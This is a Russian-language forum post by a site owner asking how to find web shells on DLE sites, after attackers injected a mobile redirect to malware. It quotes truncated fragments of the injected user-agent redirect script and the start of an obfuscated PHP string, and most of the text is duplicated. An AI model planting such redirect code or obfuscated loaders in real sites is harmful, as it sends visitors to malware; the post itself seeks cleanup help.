Добрый вечер, в скайпе всех достал уже, суть что мне залили шелл и на все сайты поставили мобильный редирект на вирусы.Я уже почистил коды, например на сайте plusing.ru мне поставили код js в сам main.tpl
<script type='text/javascript'>if(navigator.userAgent.match(/(android|mobile|midp|j2me|symbian|series 60
На других сайтах он был зашифрован. Мне посоветовали ai-bolit антивирус но он работает не коректно у меня, я на форуме у них написал жду от них ответа.
Далее я попробывал Manul Яндекса - он обнаружил в engine/inc/include/init.php зашифрованный код:
<?php $_F=__FILE__;$_X='P2lCP1ouWg = Но мне сказали что это не вирус а лицензия от DLE.
Вопрос, как найти где лежат шеллы. А то я чищу, через неделю опять редиректы ставят
<script type='text/javascript'>if(navigator.userAgent.match(/(android|mobile|midp|j2me|symbian|series 60
На других сайтах он был зашифрован. Мне посоветовали ai-bolit антивирус но он работает не коректно у меня, я на форуме у них написал жду от них ответа.
Далее я попробывал Manul Яндекса - он обнаружил в engine/inc/include/init.php зашифрованный код:
<?php $_F=__FILE__;$_X='P2lCP1ouWg = Но мне сказали что это не вирус а лицензия от DLE.
Вопрос, как найти где лежат шеллы. А то я чищу, через неделю опять редиректы ставят
